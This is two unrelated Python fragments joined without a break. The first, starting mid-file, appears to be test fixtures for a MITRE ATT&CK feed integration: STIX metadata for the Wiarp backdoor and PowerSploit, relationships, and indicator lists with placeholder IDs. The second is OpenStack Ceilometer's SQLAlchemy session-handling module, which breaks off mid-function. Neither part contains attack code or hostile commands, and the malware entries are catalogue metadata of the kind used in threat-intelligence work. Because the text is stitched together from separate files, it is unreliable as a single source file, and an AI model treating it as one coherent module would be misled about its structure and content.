(2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.", "source_name": "Symantec Wiarp May 2012", "url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99" } ], "x_mitre_platforms": [ "Windows" ], "x_mitre_aliases": [ "Wiarp" ], "modified": "2021-01-06T19:32:28.378Z", "created": "2018-04-18T17:59:24.739Z", "labels": [ "malware" ], "id": "malware--039814a0-88de-46c5-a4fb-b293db21880a", "name": "MALWARE 1", "type": "malware" }, 'map_result': {'aliases': ['Wiarp'], 'description': '[Wiarp](https://attack.mitre.org/software/S0206)', 'firstseenbysource': '2018-04-18T17:59:24.739Z', 'mitreid': 'S0206', 'modified': '2021-01-06T19:32:28.378Z', 'operatingsystemrefs': ['Windows'], 'publications': [ {'link': 'https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99', 'source': 'Symantec Wiarp May 2012', 'title': 'Zhou, R. (2012, May 15). Backdoor.Wiarp. ' 'Retrieved February 22, 2018.'}], 'stixid': 'malware--039814a0-88de-46c5-a4fb-b293db21880a', 'tags': ['S0206', 'malware']}, "indicator": ([{'fields': {'aliases': ['Wiarp'], 'description': '[Wiarp](https://attack.mitre.org/software/S0206)', 'firstseenbysource': '2018-04-18T17:59:24.739Z', 'mitreid': 'S0206', 'modified': '2021-01-06T19:32:28.378Z', 'operatingsystemrefs': ['Windows'], 'publications': [{ 'link': 'https://www.symantec.com/security_response/writeup.jsp?' 'docid=2012-051606-1005-99', 'source': 'Symantec Wiarp May 2012', 'title': 'Zhou, R. (2012, May 15). ' 'Backdoor.Wiarp. Retrieved February ' '22, 2018.'}], 'stixid': 'malware--039814a0-88de-46c5-a4fb-b293db21880a', 'tags': ['S0206', 'malware']}, 'rawJSON': {'created': '2018-04-18T17:59:24.739Z', 'description': '[Wiarp](https://attack.mitre.org/software/S0206)', 'external_references': [{'external_id': 'S0206', 'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/software/S0206'}, {'description': 'Zhou, R. (2012, May ' '15). Backdoor.Wiarp. ' 'Retrieved February 22, ' '2018.', 'source_name': 'Symantec Wiarp May ' '2012', 'url': 'https://www.symantec.com/security_response/writeup.jsp' '?docid=2012-051606-1005-99'}], 'id': 'malware--039814a0-88de-46c5-a4fb-b293db21880a', 'labels': ['malware'], 'modified': '2021-01-06T19:32:28.378Z', 'name': 'MALWARE 1', 'type': 'malware', 'x_mitre_aliases': ['Wiarp'], 'x_mitre_platforms': ['Windows']}, 'score': 3, 'type': 'Malware', 'value': 'MALWARE 1'}], [], {'malware--039814a0-88de-46c5-a4fb-b293db21880a': 'MALWARE 1'}, {}) } STIX_MALWARE = { 'response': { "description": "[Wiarp](https://attack.mitre.org/software/S0206)", "external_references": [ { "external_id": "S0206", "source_name": "mitre-attack", "url": "https://attack.mitre.org/software/S0206" }, { "description": "Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.", "source_name": "Symantec Wiarp May 2012", "url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99" } ], "x_mitre_platforms": [ "Windows" ], "x_mitre_aliases": [ "Wiarp" ], "modified": "2021-01-06T19:32:28.378Z", "created": "2018-04-18T17:59:24.739Z", "labels": [ "malware" ], "id": "malware--039814a0-88de-46c5-a4fb-b293db21880a", "name": "MALWARE 1", "type": "malware" }, 'map_result': {'stixaliases': ['Wiarp'], 'stixdescription': '[Wiarp](https://attack.mitre.org/software/S0206)', 'firstseenbysource': '2018-04-18T17:59:24.739Z', 'mitreid': 'S0206', 'modified': '2021-01-06T19:32:28.378Z', 'operatingsystemrefs': ['Windows'], 'publications': [ {'link': 'https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99', 'source': 'Symantec Wiarp May 2012', 'title': 'Zhou, R. (2012, May 15). Backdoor.Wiarp. ' 'Retrieved February 22, 2018.'}], 'stixid': 'malware--039814a0-88de-46c5-a4fb-b293db21880a', 'tags': ['S0206', 'malware']} } TOOL = { 'response': { "name": "TOOL 1", "type": "tool", "description": "[PowerSploit](https://attack.mitre.org/software/S0194)", "external_references": [ { "external_id": "S0194", "source_name": "mitre-attack", "url": "https://attack.mitre.org/software/S0194" } ], "x_mitre_platforms": [ "Windows" ], "x_mitre_aliases": [ "PowerSploit" ], "modified": "2021-02-09T14:00:16.093Z", "created": "2018-04-18T17:59:24.739Z", "labels": [ "tool" ], "id": "tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d" }, 'map_result': {'aliases': ['PowerSploit'], 'description': '[PowerSploit](https://attack.mitre.org/software/S0194)', 'firstseenbysource': '2018-04-18T17:59:24.739Z', 'mitreid': 'S0194', 'modified': '2021-02-09T14:00:16.093Z', 'operatingsystemrefs': ['Windows'], 'publications': [], 'stixid': 'tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d', 'tags': ['S0194', 'tool']}, "indicator": ([{'fields': {'aliases': ['PowerSploit'], 'description': '[PowerSploit](https://attack.mitre.org/software/S0194)', 'firstseenbysource': '2018-04-18T17:59:24.739Z', 'mitreid': 'S0194', 'modified': '2021-02-09T14:00:16.093Z', 'operatingsystemrefs': ['Windows'], 'publications': [], 'stixid': 'tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d', 'tags': ['S0194', 'tool']}, 'rawJSON': {'created': '2018-04-18T17:59:24.739Z', 'description': '[PowerSploit](https://attack.mitre.org/software/S0194)', 'external_references': [{'external_id': 'S0194', 'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/software/S0194'}], 'id': 'tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d', 'labels': ['tool'], 'modified': '2021-02-09T14:00:16.093Z', 'name': 'TOOL 1', 'type': 'tool', 'x_mitre_aliases': ['PowerSploit'], 'x_mitre_platforms': ['Windows']}, 'score': 2, 'type': 'Tool', 'value': 'TOOL 1'}], [], {'tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d': 'TOOL 1'}, {}) } STIX_TOOL = { 'response': { "name": "TOOL 1", "type": "tool", "description": "[PowerSploit](https://attack.mitre.org/software/S0194)", "external_references": [ { "external_id": "S0194", "source_name": "mitre-attack", "url": "https://attack.mitre.org/software/S0194" } ], "x_mitre_platforms": [ "Windows" ], "x_mitre_aliases": [ "PowerSploit" ], "modified": "2021-02-09T14:00:16.093Z", "created": "2018-04-18T17:59:24.739Z", "labels": [ "tool" ], "id": "tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d" }, 'map_result': {'stixaliases': ['PowerSploit'], 'stixdescription': '[PowerSploit](https://attack.mitre.org/software/S0194)', 'firstseenbysource': '2018-04-18T17:59:24.739Z', 'mitreid': 'S0194', 'modified': '2021-02-09T14:00:16.093Z', 'operatingsystemrefs': ['Windows'], 'publications': [], 'stixid': 'tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d', 'tags': ['S0194', 'tool']}, } ID_TO_NAME = { "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0": "entity b", "malware--6a21e3a4-5ffe-4581-af9a-6a54c7536f44": "entity a" } RELATION = { 'response': { "type": "relationship", "description": " [Explosive](https://attack.mitre.org/software/S0569)", "source_ref": "malware--6a21e3a4-5ffe-4581-af9a-6a54c7536f44", "created": "2021-04-27T01:56:35.810Z", "relationship_type": "uses", "modified": "2021-04-27T01:56:35.810Z", "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", }, "indicator": [{'entityA': 'entity a', 'entityAFamily': 'Indicator', 'entityAType': 'Malware', 'entityB': 'entity b', 'entityBFamily': 'Indicator', 'entityBType': 'Attack Pattern', 'fields': {'description': ' ' '[Explosive](https://attack.mitre.org/software/S0569)', 'firstseenbysource': '2021-04-27T01:56:35.810Z', 'lastseenbysource': '2021-04-27T01:56:35.810Z'}, 'name': 'uses', 'reverseName': 'used-by', 'type': 'IndicatorToIndicator'}] } MALWARE_LIST_WITHOUT_PREFIX = [ {"type": "Intrusion Set", "value": "RTM", 'fields': {"stixid": "1111"}}, {"type": "Intrusion Set", "value": "Machete", 'fields': {"stixid": "2222"}}, {"type": "Intrusion Set", "value": "APT1", 'fields': {"stixid": "3333"}}, {"type": "Intrusion Set", "value": "ATP12", 'fields': {"stixid": "4444"}}, {"type": "Malware", "value": "RTM", 'fields': {"stixid": "5555"}}, {"type": "Malware", "value": "Machete", 'fields': {"stixid": "6666"}}, {"type": "Malware", "value": "ABK", 'fields': {"stixid": "7777"}}, {"type": "Malware", "value": "Adups", 'fields': {"stixid": "8888"}}, {"type": "Malware", "value": "4H RAT", 'fields': {"stixid": "9999"}}, {"type": "Attack Pattern", "value": "Access Token", 'fields': {"stixid": "0000"}}, {"type": "Tool", "value": "at", 'fields': {"stixid": "1212"}}, {"type": "Course of Action", "value": "Account Use Policies", 'fields': {"stixid": "2323"}} ] MALWARE_LIST_WITH_PREFIX = [ {"type": "Intrusion Set", "value": "RTM", 'fields': {"stixid": "1111"}}, {"type": "Intrusion Set", "value": "Machete", 'fields': {"stixid": "2222"}}, {"type": "Intrusion Set", "value": "APT1", 'fields': {"stixid": "3333"}}, {"type": "Intrusion Set", "value": "ATP12", 'fields': {"stixid": "4444"}}, {"type": "Malware", "value": "RTM [Malware]", 'fields': {"stixid": "5555"}}, {"type": "Malware", "value": "Machete [Malware]", 'fields': {"stixid": "6666"}}, {"type": "Malware", "value": "ABK", 'fields': {"stixid": "7777"}}, {"type": "Malware", "value": "Adups", 'fields': {"stixid": "8888"}}, {"type": "Malware", "value": "4H RAT", 'fields': {"stixid": "9999"}}, {"type": "Attack Pattern", "value": "Access Token", 'fields': {"stixid": "0000"}}, {"type": "Tool", "value": "at", 'fields': {"stixid": "1212"}}, {"type": "Course of Action", "value": "Account Use Policies", 'fields': {"stixid": "2323"}} ] INDICATORS_LIST = [ {"type": "Intrusion Set", "value": "RTM", "fields": {"mitreid": "T1111.111", "stixid": "1"}}, {"type": "Intrusion Set", "value": "Machete", "fields": {"mitreid": "T1111", "stixid": "2"}}, {"type": "Intrusion Set", "value": "APT1", "fields": {"mitreid": "T1251", "stixid": "3"}}, {"type": "Intrusion Set", "value": "ATP12", "fields": {"mitreid": "T1259", "stixid": "4"}}, {"type": "Malware", "value": "RTM [Malware]", "fields": {"mitreid": "T1256", "stixid": "5"}}, {"type": "Attack Pattern", "value": "Machete 1", "fields": {"mitreid": "T1254", "stixid": "6"}}, {"type": "Attack Pattern", "value": "ABK", "fields": {"mitreid": "T1789", "stixid": "7"}}, {"type": "Attack Pattern", "value": "Adups", "fields": {"mitreid": "T1254.001", "stixid": "8"}}, {"type": "Attack Pattern", "value": "4H RAT", "fields": {"mitreid": "T1254.002", "stixid": "9"}}, {"type": "Attack Pattern", "value": "Access Token", "fields": {"mitreid": "T1789.001", "stixid": "10"}}, {"type": "Tool", "value": "at", "fields": {"mitreid": "T7854", "stixid": "11"}}, {"type": "Course of Action", "value": "Account Use Policies", "fields": {"mitreid": "T1250", "stixid": "12"}} ] NEW_INDICATORS_LIST = [ {"type": "Intrusion Set", "value": "RTM", "fields": {"mitreid": "T1111.111", "stixid": "1"}}, {"type": "Intrusion Set", "value": "Machete", "fields": {"mitreid": "T1111", "stixid": "2"}}, {"type": "Intrusion Set", "value": "APT1", "fields": {"mitreid": "T1251", "stixid": "3"}}, {"type": "Intrusion Set", "value": "ATP12", "fields": {"mitreid": "T1259", "stixid": "4"}}, {"type": "Malware", "value": "RTM [Malware]", "fields": {"mitreid": "T1256", "stixid": "5"}}, {"type": "Attack Pattern", "value": "Machete 1", "fields": {"mitreid": "T1254", "stixid": "6"}}, {"type": "Attack Pattern", "value": "ABK", "fields": {"mitreid": "T1789", "stixid": "7"}}, {"type": "Attack Pattern", "value": "Machete 1: Adups", "fields": {"mitreid": "T1254.001", "stixid": "8"}}, {"type": "Attack Pattern", "value": "Machete 1: 4H RAT", "fields": {"mitreid": "T1254.002", "stixid": "9"}}, {"type": "Attack Pattern", "value": "ABK: Access Token", "fields": {"mitreid": "T1789.001", "stixid": "10"}}, {"type": "Tool", "value": "at", "fields": {"mitreid": "T7854", "stixid": "11"}}, {"type": "Course of Action", "value": "Account Use Policies", "fields": {"mitreid": "T1250", "stixid": "12"}} ] MITRE_ID_TO_MITRE_NAME = { "T1254": "Machete 1", "T1789": "ABK", "T1254.001": "Adups", "T1254.002": "4H RAT", "T1789.001": "Access Token" } OLD_ID_TO_NAME = { "1": "RTM", "2": "Machete", "3": "APT1", "4": "ATP12", "5": "RTM [Malware]", "6": "Machete 1", "7": "ABK", "8": "Machete 1: Adups", "9": "Machete 1: 4H RAT", "10": "ABK: Access Token", "11": "at", "12": "Account Use Policies", } NEW_ID_TO_NAME = { '1': 'RTM', '10': 'ABK: Access Token', '11': 'at', '12': 'Account Use Policies', '2': 'Machete', '3': 'APT1', '4': 'ATP12', '5': 'RTM [Malware]', '6': 'Machete 1', '7': 'ABK', '8': 'Machete 1: Adups', '9': 'Machete 1: 4H RAT' }
# Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Session Handling for SQLAlchemy backend. Recommended ways to use sessions within this framework: * Don't use them explicitly; this is like running with ``AUTOCOMMIT=1``. `model_query()` will implicitly use a session when called without one supplied. This is the ideal situation because it will allow queries to be automatically retried if the database connection is interrupted. .. note:: Automatic retry will be enabled in a future patch. It is generally fine to issue several queries in a row like this. Even though they may be run in separate transactions and/or separate sessions, each one will see the data from the prior calls. If needed, undo- or rollback-like functionality should be handled at a logical level. For an example, look at the code around quotas and `reservation_rollback()`. Examples: .. code:: python def get_foo(context, foo): return (model_query(context, models.Foo). filter_by(foo=foo). first()) def update_foo(context, id, newfoo): (model_query(context, models.Foo). filter_by(id=id). update({'foo': newfoo})) def create_foo(context, values): foo_ref = models.Foo() foo_ref.update(values) foo_ref.save() return foo_ref * Within the scope of a single method, keep all the reads and writes within the context managed by a single session. In this way, the session's `__exit__` handler will take care of calling `flush()` and `commit()` for you. If using this approach, you should not explicitly call `flush()` or `commit()`. Any error within the context of the session will cause the session to emit a `ROLLBACK`. Database errors like `IntegrityError` will be raised in `session`'s `__exit__` handler, and any try/except within the context managed by `session` will not be triggered. And catching other non-database errors in the session will not trigger the ROLLBACK, so exception handlers should always be outside the session, unless the developer wants to do a partial commit on purpose. If the connection is dropped before this is possible, the database will implicitly roll back the transaction. .. note:: Statements in the session scope will not be automatically retried. If you create models within the session, they need to be added, but you do not need to call `model.save()`: .. code:: python def create_many_foo(context, foos): session = sessionmaker() with session.begin(): for foo in foos: foo_ref = models.Foo() foo_ref.update(foo) session.add(foo_ref) def update_bar(context, foo_id, newbar): session = sessionmaker() with session.begin(): foo_ref = (model_query(context, models.Foo, session). filter_by(id=foo_id). first()) (model_query(context, models.Bar, session). filter_by(id=foo_ref['bar_id']). update({'bar': newbar})) .. note:: `update_bar` is a trivially simple example of using ``with session.begin``. Whereas `create_many_foo` is a good example of when a transaction is needed, it is always best to use as few queries as possible. The two queries in `update_bar` can be better expressed using a single query which avoids the need for an explicit transaction. It can be expressed like so: .. code:: python def update_bar(context, foo_id, newbar): subq = (model_query(context, models.Foo.id). filter_by(id=foo_id). limit(1). subquery()) (model_query(context, models.Bar). filter_by(id=subq.as_scalar()). update({'bar': newbar})) For reference, this emits approximately the following SQL statement: .. code:: sql UPDATE bar SET bar = ${newbar} WHERE id=(SELECT bar_id FROM foo WHERE id = ${foo_id} LIMIT 1); .. note:: `create_duplicate_foo` is a trivially simple example of catching an exception while using ``with session.begin``. Here create two duplicate instances with same primary key, must catch the exception out of context managed by a single session: .. code:: python def create_duplicate_foo(context): foo1 = models.Foo() foo2 = models.Foo() foo1.id = foo2.id = 1 session = sessionmaker() try: with session.begin(): session.add(foo1) session.add(foo2) except exception.DBDuplicateEntry as e: handle_error(e) * Passing an active session between methods. Sessions should only be passed to private methods. The private method must use a subtransaction; otherwise SQLAlchemy will throw an error when you call `session.begin()` on an existing transaction. Public methods should not accept a session parameter and should not be involved in sessions within the caller's scope. Note that this incurs more overhead in SQLAlchemy than the above means due to nesting transactions, and it is not possible to implicitly retry failed database operations when using this approach. This also makes code somewhat more difficult to read and debug, because a single database transaction spans more than one method. Error handling becomes less clear in this situation. When this is needed for code clarity, it should be clearly documented. .. code:: python def myfunc(foo): session = sessionmaker() with session.begin(): # do some database things bar = _private_func(foo, session) return bar def _private_func(foo, session=None): if not session: session = sessionmaker() with session.begin(subtransaction=True): # do some other database things return bar There are some things which it is best to avoid: * Don't keep a transaction open any longer than necessary. This means that your ``with session.begin()`` block should be as short as possible, while still containing all the related calls for that transaction. * Avoid ``with_lockmode('UPDATE')`` when possible. In MySQL/InnoDB, when a ``SELECT ... FOR UPDATE`` query does not match any rows, it will take a gap-lock. This is a form of write-lock on the "gap" where no rows exist, and prevents any other writes to that space. This can effectively prevent any INSERT into a table by locking the gap at the end of the index. Similar problems will occur if the SELECT FOR UPDATE has an overly broad WHERE clause, or doesn't properly use an index. One idea proposed at ODS Fall '12 was to use a normal SELECT to test the number of rows matching a query, and if only one row is returned, then issue the SELECT FOR UPDATE. The better long-term solution is to use ``INSERT .. ON DUPLICATE KEY UPDATE``. However, this can not be done until the "deleted" columns are removed and proper UNIQUE constraints are added to the tables. Enabling soft deletes: * To use/enable soft-deletes, the `SoftDeleteMixin` must be added to your model class. For example: .. code:: python class NovaBase(models.SoftDeleteMixin, models.ModelBase): pass Efficient use of soft deletes: * There are two possible ways to mark a record as deleted: `model.soft_delete()` and `query.soft_delete()`. The `model.soft_delete()` method works with a single already-fetched entry. `query.soft_delete()` makes only one db request for all entries that correspond to the query. * In almost all cases you should use `query.soft_delete()`. Some examples: .. code:: python def soft_delete_bar(): count = model_query(BarModel).find(some_condition).soft_delete() if count == 0: raise Exception("0 entries were soft deleted") def complex_soft_delete_with_synchronization_bar(session=None): if session is None: session = sessionmaker() with session.begin(subtransactions=True): count = (model_query(BarModel). find(some_condition). soft_delete(synchronize_session=True)) # Here synchronize_session is required, because we # don't know what is going on in outer session. if count == 0: raise Exception("0 entries were soft deleted") * There is only one situation where `model.soft_delete()` is appropriate: when you fetch a single record, work with it, and mark it as deleted in the same transaction. .. code:: python def soft_delete_bar_model(): session = sessionmaker() with session.begin(): bar_ref = model_query(BarModel).find(some_condition).first() # Work with bar_ref bar_ref.soft_delete(session=session) However, if you need to work with all entries that correspond to query and then soft delete them you should use the `query.soft_delete()` method: .. code:: python def soft_delete_multi_models(): session = sessionmaker() with session.begin(): query = (model_query(BarModel, session=session). find(some_condition)) model_refs = query.all() # Work with model_refs query.soft_delete(synchronize_session=False) # synchronize_session=False should be set if there is no outer # session and these entries are not used after this. When working with many rows, it is very important to use query.soft_delete, which issues a single query. Using `model.soft_delete()`, as in the following example, is very inefficient. .. code:: python for bar_ref in bar_refs: bar_ref.soft_delete(session=session) # This will produce count(bar_refs) db requests. """ import functools import logging import re import time import six from sqlalchemy import exc as sqla_exc from sqlalchemy.interfaces import PoolListener import sqlalchemy.orm from sqlalchemy.pool import NullPool, StaticPool from sqlalchemy.sql.expression import literal_column from ceilometer.openstack.common.db import exception from ceilometer.openstack.common.gettextutils import _LE, _LW from ceilometer.openstack.common import timeutils LOG = logging.getLogger(__name__) class SqliteForeignKeysListener(PoolListener): """Ensures that the foreign key constraints are enforced in SQLite. The foreign key constraints are disabled by default in SQLite, so the foreign key constraints will be enabled here for every database connection """ def connect(self, dbapi_con, con_record): dbapi_con.execute('pragma foreign_keys=ON') # note(boris-42): In current versions of DB backends unique constraint # violation messages follow the structure: # # sqlite: # 1 column - (IntegrityError) column c1 is not unique # N columns - (IntegrityError) column c1, c2, ..., N are not unique # # sqlite since 3.7.16: # 1 column - (IntegrityError) UNIQUE constraint failed: tbl.k1 # # N columns - (IntegrityError) UNIQUE constraint failed: tbl.k1, tbl.k2 # # postgres: # 1 column - (IntegrityError) duplicate key value violates unique # constraint "users_c1_key" # N columns - (IntegrityError) duplicate key value violates unique # constraint "name_of_our_constraint" # # mysql: # 1 column - (IntegrityError) (1062, "Duplicate entry 'value_of_c1' for key # 'c1'") # N columns - (IntegrityError) (1062, "Duplicate entry 'values joined # with -' for key 'name_of_our_constraint'") # # ibm_db_sa: # N columns - (IntegrityError) SQL0803N One or more values in the INSERT # statement, UPDATE statement, or foreign key update caused by a # DELETE statement are not valid because the primary key, unique # constraint or unique index identified by "2" constrains table # "NOVA.KEY_PAIRS" from having duplicate values for the index # key. _DUP_KEY_RE_DB = { "sqlite": (re.compile(r"^.*columns?([^)]+)(is|are)\s+not\s+unique$"), re.compile(r"^.*UNIQUE\s+constraint\s+failed:\s+(.+)$")), "postgresql": (re.compile(r"^.*duplicate\s+key.*\"([^\"]+)\"\s*\n.*$"),), "mysql": (re.compile(r"^.*\(1062,.*'([^\']+)'\"\)$"),), "ibm_db_sa": (re.compile(r"^.*SQL0803N.*$"),), } def _raise_if_duplicate_entry_error(integrity_error, engine_name): """Raise exception if two entries are duplicated. In this function will be raised DBDuplicateEntry exception if integrity error wrap unique constraint violation. """ def get_columns_from_uniq_cons_or_name(columns): # note(vsergeyev): UniqueConstraint name convention: "uniq_t0c10c2" # where `t` it is table name and columns `c1`, `c2` # are in UniqueConstraint. uniqbase = "uniq_" if not columns.startswith(uniqbase): if engine_name == "postgresql": return [columns[columns.index("_") + 1:columns.rindex("_")]] return [columns] return columns[len(uniqbase):].split("0")[1:] if engine_name not in ["ibm_db_sa", "mysql", "sqlite", "postgresql"]: return # FIXME(johannes): The usage of the .message attribute has been # deprecated since Python 2.6. However, the exceptions raised by # SQLAlchemy can differ when using unicode() and accessing .message. # An audit across all three supported engines will be necessary to # ensure there are no regressions. for pattern in _DUP_KEY_RE_DB[engine_name]: match = pattern.match(integrity_error.message) if match: break else: return # NOTE(mriedem): The ibm_db_sa integrity error message doesn't provide the # columns so we have to omit that from the DBDuplicateEntry error. columns = '' if engine_name != 'ibm_db_sa': columns = match.group(1) if engine_name == "sqlite": columns = [c.split('.')[-1] for c in columns.strip().split(", ")] else: columns = get_columns_from_uniq_cons_or_name(columns) raise exception.DBDuplicateEntry(columns, integrity_error) # NOTE(comstud): In current versions of DB backends, Deadlock violation # messages follow the structure: # # mysql: # (OperationalError) (1213, 'Deadlock found when trying to get lock; try ' # 'restarting transaction') <query_str> <query_args> _DEADLOCK_RE_DB = { "mysql": re.compile(r"^.*\(1213, 'Deadlock.*") } def _raise_if_deadlock_error(operational_error, engine_name): """Raise exception on deadlock condition. Raise DBDeadlock exception if OperationalError contains a Deadlock condition. """ re = _DEADLOCK_RE_DB.get(engine_name) if re is None: return # FIXME(johannes): The usage of the .message attribute has been # deprecated since Python 2.6. However, the exceptions raised by # SQLAlchemy can differ when using unicode() and accessing .message. # An audit across all three supported engines will be necessary to # ensure there are no regressions. m = re.match(operational_error.message) if not m: return raise exception.DBDeadlock(operational_error) def _wrap_db_error(f): @functools.wraps(f) def _wrap(self, *args, **kwargs): try: assert issubclass( self.__class__, sqlalchemy.orm.session.Session ), ('_wrap_db_error() can only be applied to methods of ' 'subclasses of sqlalchemy.orm.session.Session.') return f(self, *args, **kwargs) except UnicodeEncodeError: raise exception.DBInvalidUnicodeParameter() except sqla_exc.OperationalError as e: _raise_if_db_connection_lost(e, self.bind) _raise_if_deadlock_error(e, self.bind.dialect.name) # NOTE(comstud): A lot of code is checking for OperationalError # so let's not wrap it for now. raise # note(boris-42): We should catch unique constraint violation and # wrap it by our own DBDuplicateEntry exception. Unique constraint # violation is wrapped by IntegrityError. except sqla_exc.IntegrityError as e: # note(boris-42): SqlAlchemy doesn't unify errors from different # DBs so we must do this. Also in some tables (for example # instance_types) there are more than one unique constraint. This # means we should get names of columns, which values violate # unique constraint, from error message. _raise_if_duplicate_entry_error(e, self.bind.dialect.name) raise exception.DBError(e) except Exception as e: LOG.exception(_LE('DB exception wrapped.')) raise exception.DBError(e) return _wrap def _synchronous_switch_listener(dbapi_conn, connection_rec): """Switch sqlite connections to non-synchronous mode.""" dbapi_conn.execute("PRAGMA synchronous = OFF") def _add_regexp_listener(dbapi_con, con_record): """Add REGEXP function to sqlite connections.""" def regexp(expr, item): reg = re.compile(expr) return reg.search(six.text_type(item)) is not None dbapi_con.create_function('regexp', 2, regexp) def _thread_yield(dbapi_con, con_record): """Ensure other greenthreads get a chance to be executed. If we use eventlet.monkey_patch(), eventlet.greenthread.sleep(0) will execute instead of time.sleep(0). Force a context switch. With common database backends (eg MySQLdb and sqlite), there is no implicit yield caused by network I/O since they are implemented by C libraries that eventlet cannot monkey patch. """ time.sleep(0) def _ping_listener(engine, dbapi_conn, connection_rec, connection_proxy): """Ensures that MySQL and DB2 connections are alive. Borrowed from: http://groups.google.com/group/sqlalchemy/msg/a4ce563d802c929f """ cursor = dbapi_conn.cursor() try: ping_sql = 'select 1' if engine.name == 'ibm_db_sa': # DB2 requires a table expression ping_sql = 'select 1 from (values (1)) AS t1' cursor.execute(ping_sql) except Exception as ex: if engine.dialect.is_disconnect(ex, dbapi_conn, cursor): msg = _LW('Database server has gone away: %s') % ex LOG.warning(msg) # if the database server has gone away, all connections in the pool # have become invalid and we can safely close all of them here, # rather than waste time on checking of every single connection engine.dispose() # this will be handled by SQLAlchemy and will force it to create # a new connection and retry the original action raise sqla_exc.DisconnectionError(msg) else: raise def _set_session_sql_mode(dbapi_con, connection_rec, sql_mode=None): """Set the sql_mode session variable. MySQL supports several server modes. The default is None, but sessions may choose to enable server modes like TRADITIONAL, ANSI, several STRICT_* modes and others. Note: passing in '' (empty string) for sql_mode clears the SQL mode for the session, overriding a potentially set server default. """ cursor = dbapi_con.cursor() cursor.execute("SET SESSION sql_mode = %s", [sql_mode]) def _mysql_get_effective_sql_mode(engine): """Returns the effective SQL mode for connections from the engine pool. Returns ``None`` if the mode isn't available, otherwise returns the mode. """ # Get the real effective SQL mode. Even when unset by # our own config, the server may still be operating in a specific # SQL mode as set by the server configuration. # Also note that the checkout listener will be called on execute to # set the mode if it's registered. row = engine.execute("SHOW VARIABLES LIKE 'sql_mode'").fetchone() if row is None: return return row[1] def _mysql_check_effective_sql_mode(engine): """Logs a message based on the effective SQL mode for MySQL connections.""" realmode = _mysql_get_effective_sql_mode(engine) if realmode is None: LOG.warning(_LW('Unable to detect effective SQL mode')) return LOG.debug('MySQL server mode set to %s', realmode) # 'TRADITIONAL' mode enables several other modes, so # we need a substring match here if not ('TRADITIONAL' in realmode.upper() or 'STRICT_ALL_TABLES' in realmode.upper()): LOG.warning(_LW("MySQL SQL mode is '%s', " "consider enabling TRADITIONAL or STRICT_ALL_TABLES"), realmode) def _mysql_set_mode_callback(engine, sql_mode): if sql_mode is not None: mode_callback = functools.partial(_set_session_sql_mode, sql_mode=sql_mode) sqlalchemy.event.listen(engine, 'connect', mode_callback) _mysql_check_effective_sql_mode(engine) def _is_db_connection_error(args): """Return True if error in connecting to db.""" # NOTE(adam_g): This is currently MySQL specific and needs to be extended # to support Postgres and others. # For the db2, the error code is -30081 since the db2 is still not ready conn_err_codes = ('2002', '2003', '2006', '2013', '-30081') for err_code in conn_err_codes: if args.find(err_code) != -1: return True return False def _raise_if_db_connection_lost(error, engine): # NOTE(vsergeyev): Function is_disconnect(e, connection, cursor) # requires connection and cursor in incoming parameters, # but we have no possibility to create connection if DB # is not available, so in such case reconnect fails. # But is_disconnect() ignores these parameters, so it # makes sense to pass to function None as placeholder # instead of connection and cursor. if engine.dialect.is_disconnect(error, None, None): raise exception.DBConnectionError(error) def create_engine(sql_connection, sqlite_fk=False, mysql_sql_mode=None, idle_timeout=3600, connection_debug=0, max_pool_size=None, max_overflow=None, pool_timeout=None, sqlite_synchronous=True, connection_trace=False, max_retries=10, retry_interval=10): """Return a new SQLAlchemy engine.""" connection_dict = sqlalchemy.engine.url.make_url(sql_connection) engine_args = { "pool_recycle": idle_timeout, 'convert_unicode': True, } logger = logging.getLogger('sqlalchemy.engine') # Map SQL debug level to Python log level if connection_debug >= 100: logger.setLevel(logging.DEBUG) elif connection_debug >= 50: logger.setLevel(logging.INFO) else: logger.setLevel(logging.WARNING) if "sqlite" in connection_dict.drivername: if sqlite_fk: engine_args["listeners"] = [SqliteForeignKeysListener()] engine_args["poolclass"] = NullPool if sql_connection == "sqlite://": engine_args["poolclass"] = StaticPool engine_args["connect_args"] = {'check_same_thread': False} else: if max_pool_size is not None: engine_args['pool_size'] = max_pool_size if max_overflow is not None: engine_args['max_overflow'] = max_overflow if pool_timeout is not None: engine_args['pool_timeout'] = pool_timeout engine = sqlalchemy.create_engine(sql_connection, **engine_args) sqlalchemy.event.listen(engine, 'checkin', _thread_yield) if engine.name in ['mysql', 'ibm_db_sa']: ping_callback = functools.partial(_ping_listener, engine) sqlalchemy.event.listen(engine, 'checkout', ping_callback) if engine.name == 'mysql': if mysql_sql_mode: _mysql_set_mode_callback(engine, mysql_sql_mode) elif 'sqlite' in connection_dict.drivername: if not sqlite_synchronous: sqlalchemy.event.listen(engine, 'connect', _synchronous_switch_listener) sqlalchemy.event.listen(engine, 'connect', _add_regexp_listener) if connection_trace and engine.dialect.dbapi.__name__ == 'MySQLdb': _patch_mysqldb_with_stacktrace_comments() try: engine.connect() except sqla_exc.OperationalError as e: if not _is_db_connection_error(e.args[0]): raise remaining = max_retries if remaining == -1: remaining = 'infinite' while True: msg = _LW('SQL connection failed. %s attempts left.') LOG.warning(msg % remaining) if remaining != 'infinite': remaining -= 1 time.sleep(retry_interval) try: engine.connect() break 